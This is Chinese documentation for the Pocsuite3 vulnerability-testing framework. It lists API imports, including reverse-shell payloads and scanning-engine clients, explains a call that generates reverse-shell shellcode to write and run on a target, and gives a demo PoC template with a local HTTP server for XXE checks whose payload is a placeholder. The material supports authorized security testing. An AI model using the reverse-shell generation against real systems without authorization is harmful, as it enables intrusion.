Pocsuite3通用 API 列表
在编写 PoC 的时候,相关方法请尽量调用 Pocsuite3 已封装的 API。
通用方法
| 方法 | 说明 |
|---|---|
| from pocsuite3.api import logger | 日志记录,比如logger.log(info) |
| from pocsuite3.api import requests | 请求类,用法同 requests |
| from pocsuite3.api import Seebug | Seebug api 调用 |
| from pocsuite3.api import ZoomEye | ZoomEye api 调用 |
| from pocsuite3.api import Shodan | Shodan api 调用 |
| from pocsuite3.api import Fofa | Fofa api 调用 |
| from pocsuite3.api import Quake | Quake api 调用 |
| from pocsuite3.api import Hunter | Hunter api 调用 |
| from pocsuite3.api import Censys | Censys api 调用 |
| from pocsuite3.api import CEye | CEye api 调用 |
| from pocsuite3.api import Interactsh | Interactsh api 调用 |
| from pocsuite3.api import crawl | 简单爬虫功能 |
| from pocsuite3.api import PHTTPServer | Http 服务功能 |
| from pocsuite3.api import REVERSE_PAYLOAD | 反向连接 shell payload |
| from pocsuite3.api import get_results | 获取结果 |
(TODO:API 文档完善)
ShellCode 生成支持
在一些特殊的 Linux 和 Windows 环境下,想得到反弹 shell 条件比较困难。为此我们制作了用于在 Windows/Linux x86/x64 环境下的用于反弹的 shellcode,并制作了接口支持,你在只需要拥有命令执行权限下便可以自动将 shellcode 写入到目标机器以及执行反弹 shell 命令。
Demo Poc:https://github.com/knownsec/pocsuite3/blob/master/pocsuite3/pocs/thinkphp_rce2.py
from pocsuite3.api import generate_shellcode_list
_list = generate_shellcode_list(listener_ip=get_listener_ip(), listener_port=get_listener_port(), os_target=OS.LINUX, os_target_arch=OS_ARCH.X86)
将生成一长串执行指令,执行这些指令便可以反弹出一个 shell。
HTTP 服务内置
对于一些需要第三方 HTTP 服务才能验证的漏洞,Pocsuite3 也提供对应的 API,支持在本地开启一个 HTTP 服务方便进行验证。
可查看测试用例:https://github.com/knownsec/pocsuite3/blob/master/tests/test_httpserver.py
"""
If you have issues about development, please read:
https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md
for more about information, plz visit https://pocsuite.org
"""
from http.server import SimpleHTTPRequestHandler
from pocsuite3.api import Output, POCBase, register_poc
from pocsuite3.api import PHTTPServer
class MyRequestHandler(SimpleHTTPRequestHandler):
def do_GET(self):
path = self.path
status = 404
count = 0
xxe_dtd = '''xxx'''
if path == "/xxe_dtd":
count = len(xxe_dtd)
status = 200
self.send_response(status)
self.send_header('Content-Type', 'text/html')
self.send_header('Content-Length', '{}'.format(count))
self.end_headers()
self.wfile.write(xxe_dtd.encode())
return
self.send_response(status)
self.send_header('Content-Type', 'text/html')
self.send_header("Content-Length", "{}".format(count))
self.end_headers()
def do_HEAD(self):
status = 404
if self.path.endswith('jar'):
status = 200
self.send_response(status)
self.send_header("Content-type", "text/html")
self.send_header("Content-Length", "0")
self.end_headers()
class DemoPOC(POCBase):
vulID = '' # ssvid
version = '1.0'
author = ['seebug']
vulDate = '2018-03-08'
createDate = '2018-04-12'
updateDate = '2018-04-13'
references = ['']
name = ''
appPowerLink = ''
appName = ''
appVersion = ''
vulType = ''
desc = '''
'''
samples = []
install_requires = ['']
def _verify(self):
result = {}
'''Simple http server demo
default params:
bind_ip='0.0.0.0'
bind_port=666
is_ipv6=False
use_https=False
certfile=os.path.join(paths.POCSUITE_DATA_PATH, 'cacert.pem')
requestHandler=BaseRequestHandler
You can write your own handler, default list current directory
'''
httpd = PHTTPServer(requestHandler=MyRequestHandler)
httpd.start()
# Write your code
return self.parse_output(result)
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('target is not vulnerable')
return output
_attack = _verify
register_poc(DemoPOC)